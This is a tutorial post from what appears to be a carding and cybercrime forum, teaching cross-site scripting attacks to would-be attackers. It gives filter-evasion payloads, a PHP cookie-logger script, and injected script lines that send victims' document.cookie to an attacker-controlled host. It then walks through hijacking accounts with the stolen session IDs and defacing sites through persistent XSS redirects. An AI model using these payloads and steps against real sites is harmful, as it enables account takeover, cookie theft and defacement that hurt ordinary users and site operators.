If you have any questions, contact us:
Telegram:maintex
ICQ:1607000

  #1 Old 08-31-2013, 05:53 PM
Cartographer
 
Cartographer's Avatar
 
Join Date: Aug 2013
Posts: 511
Cartographer is on a distinguished road
Default XSS 101

Title:XSS 101
Author:KNS

I. What is XSS?
Cross-site scripting (XSS), it should have been CSS but that name is already taken by Cascade-Style Sheets so it became XSS, is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls, steal cookies or other types of malicious activities. They are very common nowadays. - Wikipedia (http://en.wikipedia.org/wiki/Cross-site_scripting)


II. XSS'ing

1. How to test for XSS?
The easiest way to find an XSS flaw is to find a text input field on website/application you currently are viewing. Very common XSS injection locations are username, signature or other contact fields and/or the search field.

Once you select a field you can input a test cross-site scripting injection. Enter <script>alert(1337)</script> or "><script>alert(1337)</script> (bypasses some protections) in the select form or field (search one for e.g.). It should return a popup alert containing the number 1337. Some websites might have protection measures so you can use various obfuscation methods to bypass the restrictions, a very good resource is the XSS cheat sheet - http://ha.ckers.org/xss.html

2. Filter Evasion
Sometimes your forms would be patched in some way (will have restrictions on characters, specific inputs etc.) but most of the time they do poor quality protections.

Scenario 1: If it returns a blank/empty reflection or an "Invalid Input" error then the website is most likely blocking the keywords <script> and </script>. You can bypass this filter simply by changing the case of the script tag. For example, <SCRIPT>alert(1337)</SCRIPT> or <ScripT>alert(1337)</ScripT>.

Scenario 2: If it returns your script with quotes around it ("<script>alert(1337)</script>") then you can attempt to close the quotes before you start the script. You can do this by adding "> before the script. For example, "><script>alert(1337)</alert> (as shown above). Quotes are "negative" factors because when placed around the script they convert the script to plain text and don't allow it to function.

Scenario 3: If it returns your script without the <script> tag(only alert(1337)) then it is only removing the tags and not considering the whole input invalid. To bypass this just add another tag around the <script> tag. For example, <sc<script>ript>alert(1337)</sc</script>ript>. The filter will automatically remove the tag covering your input, therefore only <script>alert(1337)</script> will remain.

Scenario 4: If the website simply won't allow you to post the script tags or the alert you can attempt to encode your script into hex. You can do this by using Xlate or any other free ASCII to hex converter. Once you get the hex version of the script you can enter it in just as you would do with the ASCII version of the script and it will have the same outcome.


3. MaxLength limitations
In many cases input fields will have a limit to the amount of characters that can be entered and sometimes your script will exceed that limit. There are a few methods that can be used to bypass this:

Method 1: On some websites you will be able to increase the maximum amount of characters allowed. To change the MaxLength perform the following steps:
1. Right click on the input field
2. Click 'inspect element'
3. Find the line which holds <input id="query" type="text" maxlength="10" size="13" name="search_term" class="input_text"> and increase the number after maxlength=".
4. Submit the form. If it returns an error stating that the information entered in the form was faulty then the website is not vulnerable to this.

Method 2: Upload the script to your server and enter it to use as the source. There are two ways to do this:
1. <img src='http://urfreehosting./wootscript.js'></img>
2. <script src='http://urfreehosting.com/wootscript.js'></script>


4. Attack Vectors
There are two main types of XSS vulnerabilities, reflected and persistent. A reflected XSS is one in which you fill out an input field of something like a search bar, email subscription field, or anything else that won't permanently remain on the website and will disappear as soon as you leave the page. These will take effect with the help of Social Engineering. A persistent XSS vulnerability is used in locations on a website such as a comment field, public profile information or anything else that will remain on-site and visible to other people.

If you find a persistent XSS on a website you will be able to run any script that you want which includes having the ability to deface that certain page(which I assume that the majority of you reading this want).
If you find a reflective XSS you'll be able to run scripts on the site like cookie stealing and CSRF but it will require some social engineering. I consider cookie stealing very useful and will explain why further on in this tutorial but I will also show you how to deface a website via a persistent XSS vulnerability.

Cookie Stealing
1. Find a vulnerable XSSi location on the website. We'll use Site.com/search.word?=(Script Here).

2. Upload your cookie to a web server. You can use a paid web host like Go Daddy and Host Gator or a free one like t35.com, x10hosting.com or any other.

3. Open notepad and paste the following:
PHP Code:
PHP Code:
<?php
$cookie 
$_GET['cookie'];
$log fopen("log.txt""a");
fwrite($log$cookie ."\n");
fclose($log);
?>
Save it however you like but it must be with a .php extension for example l0gg3r.php.

4. Upload l0gg3r.php to the root folder of your web server.

5. Add a file named log.txt to the root folder as well.

6. Add the following script to your XSS injectable URL (replace urfreesitehosting.com/l0gg3r.php with your site/l0gg3r.php).
Code:
<script>document.location="http://www.urfreesitehosting.com/l0gg3r.php?cookie=" + document.cookie;</script>
If you want to make this less noticeable then you can use another script that redirects them back to the ictim site after they visit your cookie logger:
Code:
<script language= "JavaScript">document.location="http://urfreesitehosting.com/l0gg3r.php?cookie=" + document.cookie;document.location="http://www.victimexample.net"</script>
7. Send your target the XSS injected link. For example, ours would be
victimexample.net/search.php?word=<script>document.location="http://www.urfreesitehosting.com/l0gg3r.php?cookie=" + document.cookie;</script>
If you don't want your target to see the script you can encode it into hex just like Scenario 4 of Filter Evasion. Only encode the script (everything after victimexample.net/search?word= ).

8. You have successfully logged their cookies! Site.com has sent them to your logger and you now have their site.com cookies. Now gather their PHPSESSID or any other session ID cookie that you've logged.

9. Download the add-on "Edit This Cookie" for Google Chrome and Mozilla Firefox.

10. Go to edit this cookie and replace your session ID with their's. Now click 'Submit Cookie Changes'. You should now be logged in to the admin's/target's account. You can now do anything that doesn't require you to enter their password from making a post or sending a Private Message to (if you're on an administrator account) deleting threads, maybe defacing the website, or banning members.

5. Defacing or how to be a douchebag skid
Find a persistent XSS and enter the following script:
Code:
<script>window.location="http://urfreehosting.com/defacepage.html";</script>
Now the page will redirect to your deface and this of course is most-likely to work on guestbooks and other useless websites.

III. Future improvements
I wrote this guide a lot of time ago and I finally to improve and add content especially for carder.pro . It will be updated and more interesting attacks will be added. If you have any suggestions/feedback/criticism please leave a comment.
Cartographer is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Bin Selection 101 Cartographer Tutorials 2 12-24-2017 01:50 AM
Нужен обнал дампов 101 edward Реальный кардинг 1 04-13-2014 11:44 PM
Bypassing SQLiRFILFI and XSS filters Cartographer Tutorials 0 08-31-2013 05:51 PM
Xss - faq Cartographer Статьи 0 08-25-2013 10:38 AM
Предназначение XSS атак Cartographer Статьи 0 08-22-2013 09:52 PM


Cybercrime forum, cybercrime site, ,fraud forum, russian fraud forum, Credit cards, carder, infraud, carders.ws, crdpro, fraudsters, darkpro, crdcrew, dumps, cvv, cc, stuff carding, legit seller, vendor, free cvv, dumps+pin, skimmer, ,shimmer, emv software, emv chip writer, free cc+cvv, valid cards, track 2, free cvv, dump pin, dumps, cvv, cc, credit cards, real carding, legit vendor, carder forum, carding tutorial, russian hackers, online cvv shop, track 101, enroll, fullz